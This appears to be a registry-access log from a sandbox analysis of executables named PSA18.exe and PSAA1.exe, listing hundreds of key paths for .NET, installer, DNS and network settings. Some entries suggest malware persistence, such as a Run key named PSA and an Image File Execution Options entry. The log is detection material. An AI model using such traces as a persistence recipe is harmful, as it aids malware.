HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\NIDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\MissingDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Windows.Forms,2.0.0.0,,b77a5c561934e089,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Drawing__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Drawing,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System__b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System,2.0.0.0,,b77a5c561934e089,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Xml__b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Xml,2.0.0.0,,b77a5c561934e089,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Configuration__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Configuration,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Deployment__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Deployment,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Runtime.Serialization.Formatters.Soap__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Runtime.Serialization.Formatters.Soap,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.Accessibility__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\Accessibility,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Security__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Security,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\Policy\APTCA
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\35f7c0fc\64f653f2
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Managed\S-1-5-21-1822907384-1282624486-319450072-1000\Installer\Assemblies\C:|Users|Seven01|AppData|Local|Temp|PSA18.exe
HKEY_CURRENT_USER\Software\Microsoft\Installer\Assemblies\C:|Users|Seven01|AppData|Local|Temp|PSA18.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Installer\Assemblies\C:|Users|Seven01|AppData|Local|Temp|PSA18.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Managed\S-1-5-21-1822907384-1282624486-319450072-1000\Installer\Assemblies\Global
HKEY_CURRENT_USER\Software\Microsoft\Installer\Assemblies\Global
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Installer\Assemblies\Global
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Windows Error Reporting\WMR
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\Windows Error Reporting\WMR\Disable
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\35f7c0fc\156b2548
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Lsa\FipsAlgorithmPolicy
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy\Enabled
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Lsa
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.8.0.Microsoft.VisualBasic__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9\2e
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9\2e\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9\2e\ConfigMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9\2e\ConfigString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9\2e\MVID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9\2e\EvalationData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9\2e\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9\2e\ILDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9\2e\NIDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9\2e\MissingDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\f6e8397\46ad0879\6f
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\f6e8397\46ad0879\6f\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\f6e8397\46ad0879\6f\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\f6e8397\46ad0879\6f\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\f6e8397\46ad0879\6f\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\f6e8397\46ad0879\6f\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2b1a4e4\38a3212c\44
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2b1a4e4\38a3212c\44\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2b1a4e4\38a3212c\44\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2b1a4e4\38a3212c\44\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2b1a4e4\38a3212c\44\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2b1a4e4\38a3212c\44\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\24bf93f6\455bab30\6e
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\24bf93f6\455bab30\6e\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\24bf93f6\455bab30\6e\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\24bf93f6\455bab30\6e\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\24bf93f6\455bab30\6e\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\24bf93f6\455bab30\6e\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\4f99a7c9\53bea2b0\2e
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\4f99a7c9\53bea2b0\2e\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\4f99a7c9\53bea2b0\2e\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\4f99a7c9\53bea2b0\2e\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\4f99a7c9\53bea2b0\2e\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\4f99a7c9\53bea2b0\2e\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\Microsoft.VisualBasic,8.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Web__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Web,2.0.0.0,,b03f5f7f11d50a3a,x86
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Management__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Management,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Runtime.Remoting__b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Runtime.Remoting,2.0.0.0,,b77a5c561934e089,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.mscorlib.resources_it-IT_b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5e8c75c\40dcb014
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.mscorlib.resources_it_b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5e8c75c\1ffc8ca7
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\4ad60644\6f323003
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5d1b2185\235dd0a9
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5d1b2185\9e47f51
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\GRE_Initialize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\GRE_Initialize\DisableMetaFiles
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System
HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\DisableUNCCheck
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\EnableExtensions
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\DelayedExpansion
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\DefaultColor
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\CompletionChar
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\PathCompletionChar
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\AutoRun
HKEY_CURRENT_USER\Software\Microsoft\Command Processor
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\DisableUNCCheck
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\EnableExtensions
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\DelayedExpansion
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\DefaultColor
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\CompletionChar
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\PathCompletionChar
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\AutoRun
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\it-IT
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\it-IT
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\Locale
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\Locale\Alternate Sorts
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\Language Groups
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Locale\00000410
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Language Groups\1
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PSAA1.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Managed\S-1-5-21-1822907384-1282624486-319450072-1000\Installer\Assemblies\C:|Users|Seven01|Desktop|PSAA1.exe
HKEY_CURRENT_USER\Software\Microsoft\Installer\Assemblies\C:|Users|Seven01|Desktop|PSAA1.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Installer\Assemblies\C:|Users|Seven01|Desktop|PSAA1.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\2bf06400\42efdaaf
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\2bf06400\1e06b0ca
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\PSA
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\dc6bce8\38a2ece8
HKEY_CURRENT_USER\Control Panel\International
HKEY_CURRENT_USER\Control Panel\International\sYearMonth
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\DbgJITDebugLaunchSetting
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\DbgManagedDebugger
HKEY_CURRENT_USER\Software\Classes
HKEY_CURRENT_USER\Software\Classes\AppID\PSAA1.exe
HKEY_LOCAL_MACHINE\Software\Microsoft\OLE\AppCompat
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OLE\AppCompat\RaiseDefaultAuthnLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OLE
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OLE\DefaultAccessPermission
HKEY_CURRENT_USER\Software\Classes\Interface\{00000134-0000-0000-C000-000000000046}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{00000134-0000-0000-C000-000000000046}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{00000134-0000-0000-C000-000000000046}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\Software\Microsoft\Rpc\Extensions
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Rpc\Extensions\NdrOleExtDLL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Rpc\Extensions\RemoteRpcDll
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\BFE
HKEY_LOCAL_MACHINE\Software\Microsoft\SQMClient\Windows\DisabledProcesses\
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\DisabledProcesses\1A460378
HKEY_LOCAL_MACHINE\Software\Microsoft\SQMClient\Windows\DisabledSessions\
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\DisabledSessions\MachineThrottling
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\DisabledSessions\GlobalSession
HKEY_LOCAL_MACHINE\Software\Microsoft\Ole
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OLE\MaximumAllowedAllocationSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\159a66b8\424bd4d8
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\159a66b8\424bd4d8\87
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\159a66b8\424bd4d8\87\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\159a66b8\424bd4d8\87\ConfigMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\159a66b8\424bd4d8\87\ConfigString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\159a66b8\424bd4d8\87\MVID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\159a66b8\424bd4d8\87\EvalationData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\159a66b8\424bd4d8\87\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\159a66b8\424bd4d8\87\ILDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\159a66b8\424bd4d8\87\NIDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\159a66b8\424bd4d8\87\MissingDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6faf58\19ab8d57
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6faf58\19ab8d57\86
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6faf58\19ab8d57\86\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6faf58\19ab8d57\86\ConfigMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6faf58\19ab8d57\86\ConfigString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6faf58\19ab8d57\86\MVID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6faf58\19ab8d57\86\EvalationData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6faf58\19ab8d57\86\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6faf58\19ab8d57\86\ILDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6faf58\19ab8d57\86\NIDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6faf58\19ab8d57\86\MissingDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\75638fee\7566cac\84
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\75638fee\7566cac\84\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\75638fee\7566cac\84\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\75638fee\7566cac\84\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\75638fee\7566cac\84\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\75638fee\7566cac\84\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Data.SqlXml__b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Data.SqlXml,2.0.0.0,,b77a5c561934e089,MSIL
HKEY_CLASSES_ROOT\CLSID\{FAE3D380-FEA4-4623-8C75-C6B61110B681}\Instance
HKEY_CLASSES_ROOT\CLSID\{FAE3D380-FEA4-4623-8C75-C6B61110B681}\Instance\Disabled
HKEY_CLASSES_ROOT\CLSID\{FAE3D380-FEA4-4623-8C75-C6B61110B681}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{FAE3D380-FEA4-4623-8C75-C6B61110B681}\Namespaces
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\InstallationType
HKEY_LOCAL_MACHINE\Software\Microsoft\Tracing
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\EnableConsoleTracing
HKEY_LOCAL_MACHINE\Software\Microsoft\Tracing\PSAA1_RASAPI32
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\PSAA1_RASAPI32\EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\PSAA1_RASAPI32\EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\PSAA1_RASAPI32\FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\PSAA1_RASAPI32\ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\PSAA1_RASAPI32\MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\PSAA1_RASAPI32\FileDirectory
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\.NET CLR Networking\Performance\Library
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\.NET CLR Networking\Performance\IsMultiInstance
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\.NET CLR Networking\Performance\First Counter
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\.NET CLR Networking\Performance\CategoryOptions
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\.NET CLR Networking\Performance\FileMappingSize
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\.NET CLR Networking\Performance\Counter Names
HKEY_CURRENT_USER
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DnsCache\Parameters
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\DnsClient
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DNS
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\QueryAdapterName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\QueryAdapterName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\DisableAdapterDomainName
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\UseDomainNameDevolution
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\UseDomainNameDevolution
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\UseDomainNameDevolution
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\DomainNameDevolutionLevel
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\DomainNameDevolutionLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\PrioritizeRecordData
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\PrioritizeRecordData
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\PrioritizeRecordData
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\AllowUnqualifiedQuery
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\AllowUnqualifiedQuery
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\AllowUnqualifiedQuery
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\AppendToMultiLabelName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\AppendToMultiLabelName
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\ScreenBadTlds
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\ScreenBadTlds
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\ScreenUnreachableServers
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\ScreenUnreachableServers
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\ScreenDefaultServers
